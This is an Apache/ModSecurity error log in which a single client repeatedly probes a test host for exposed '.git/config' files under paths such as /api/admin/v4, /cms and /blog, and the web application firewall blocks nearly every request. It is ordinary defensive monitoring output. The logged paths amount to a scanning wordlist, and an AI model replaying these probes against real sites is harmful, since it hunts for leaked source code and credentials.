[Wed May 29 05:15:28.555746 2024] [:error] [pid 3548008] [client 91.215.85.43:40368] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3UwAAAAA"]
[Wed May 29 05:15:28.557361 2024] [:error] [pid 3549404] [client 91.215.85.43:40298] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_76wAAAAY"]
[Wed May 29 05:15:28.557790 2024] [:error] [pid 3549404] [client 91.215.85.43:40298] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_76wAAAAY"]
[Wed May 29 05:15:28.558107 2024] [:error] [pid 3549404] [client 91.215.85.43:40298] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_76wAAAAY"]
[Wed May 29 05:15:28.558228 2024] [:error] [pid 3548012] [client 91.215.85.43:40382] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQOwAAAAQ"]
[Wed May 29 05:15:28.558483 2024] [:error] [pid 3548012] [client 91.215.85.43:40382] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQOwAAAAQ"]
[Wed May 29 05:15:28.558730 2024] [:error] [pid 3548012] [client 91.215.85.43:40382] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQOwAAAAQ"]
[Wed May 29 05:15:28.561365 2024] [authz_core:error] [pid 3549624] [client 91.215.85.43:40312] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Wed May 29 05:15:28.562110 2024] [:error] [pid 3548011] [client 91.215.85.43:40336] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6AAAAAM"]
[Wed May 29 05:15:28.562328 2024] [:error] [pid 3548011] [client 91.215.85.43:40336] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6AAAAAM"]
[Wed May 29 05:15:28.562487 2024] [:error] [pid 3548011] [client 91.215.85.43:40336] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6AAAAAM"]
[Wed May 29 05:15:28.637947 2024] [:error] [pid 3548013] [client 91.215.85.43:40346] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnAAAAAU"]
[Wed May 29 05:15:28.638357 2024] [:error] [pid 3548013] [client 91.215.85.43:40346] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnAAAAAU"]
[Wed May 29 05:15:28.638613 2024] [:error] [pid 3548013] [client 91.215.85.43:40346] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnAAAAAU"]
[Wed May 29 05:15:28.640784 2024] [:error] [pid 3548009] [client 91.215.85.43:40360] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxgAAAAE"]
[Wed May 29 05:15:28.641391 2024] [:error] [pid 3548009] [client 91.215.85.43:40360] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxgAAAAE"]
[Wed May 29 05:15:28.641793 2024] [:error] [pid 3548009] [client 91.215.85.43:40360] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxgAAAAE"]
[Wed May 29 05:15:28.647631 2024] [:error] [pid 3548010] [client 91.215.85.43:40370] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRQAAAAI"]
[Wed May 29 05:15:28.647927 2024] [:error] [pid 3548010] [client 91.215.85.43:40370] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRQAAAAI"]
[Wed May 29 05:15:28.648137 2024] [:error] [pid 3548010] [client 91.215.85.43:40370] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRQAAAAI"]
[Wed May 29 05:15:28.653338 2024] [:error] [pid 3548012] [client 91.215.85.43:40438] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPAAAAAQ"]
[Wed May 29 05:15:28.653615 2024] [:error] [pid 3548012] [client 91.215.85.43:40438] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPAAAAAQ"]
[Wed May 29 05:15:28.653815 2024] [:error] [pid 3548012] [client 91.215.85.43:40438] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPAAAAAQ"]
[Wed May 29 05:15:28.655572 2024] [:error] [pid 3548008] [client 91.215.85.43:40396] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /flock/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VAAAAAA"]
[Wed May 29 05:15:28.655805 2024] [:error] [pid 3548008] [client 91.215.85.43:40396] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VAAAAAA"]
[Wed May 29 05:15:28.656005 2024] [:error] [pid 3548008] [client 91.215.85.43:40396] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VAAAAAA"]
[Wed May 29 05:15:28.662772 2024] [:error] [pid 3549404] [client 91.215.85.43:40412] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cms/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77AAAAAY"]
[Wed May 29 05:15:28.663322 2024] [:error] [pid 3549404] [client 91.215.85.43:40412] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77AAAAAY"]
[Wed May 29 05:15:28.663704 2024] [:error] [pid 3549404] [client 91.215.85.43:40412] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77AAAAAY"]
[Wed May 29 05:15:28.667195 2024] [:error] [pid 3549624] [client 91.215.85.43:40422] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbAAAAAc"]
[Wed May 29 05:15:28.668647 2024] [:error] [pid 3548011] [client 91.215.85.43:40444] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /new/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6QAAAAM"]
[Wed May 29 05:15:28.669199 2024] [:error] [pid 3548011] [client 91.215.85.43:40444] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6QAAAAM"]
[Wed May 29 05:15:28.669602 2024] [:error] [pid 3548011] [client 91.215.85.43:40444] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6QAAAAM"]
[Wed May 29 05:15:28.671321 2024] [:error] [pid 3549624] [client 91.215.85.43:40422] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbAAAAAc"]
[Wed May 29 05:15:28.671714 2024] [:error] [pid 3549624] [client 91.215.85.43:40422] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbAAAAAc"]
[Wed May 29 05:15:28.741746 2024] [:error] [pid 3548009] [client 91.215.85.43:40468] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxwAAAAE"]
[Wed May 29 05:15:28.742321 2024] [:error] [pid 3548009] [client 91.215.85.43:40468] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxwAAAAE"]
[Wed May 29 05:15:28.742722 2024] [:error] [pid 3548009] [client 91.215.85.43:40468] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KxwAAAAE"]
[Wed May 29 05:15:28.743414 2024] [:error] [pid 3548013] [client 91.215.85.43:40458] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnQAAAAU"]
[Wed May 29 05:15:28.747229 2024] [:error] [pid 3548010] [client 91.215.85.43:40504] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /demo/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcRgAAAAI"]
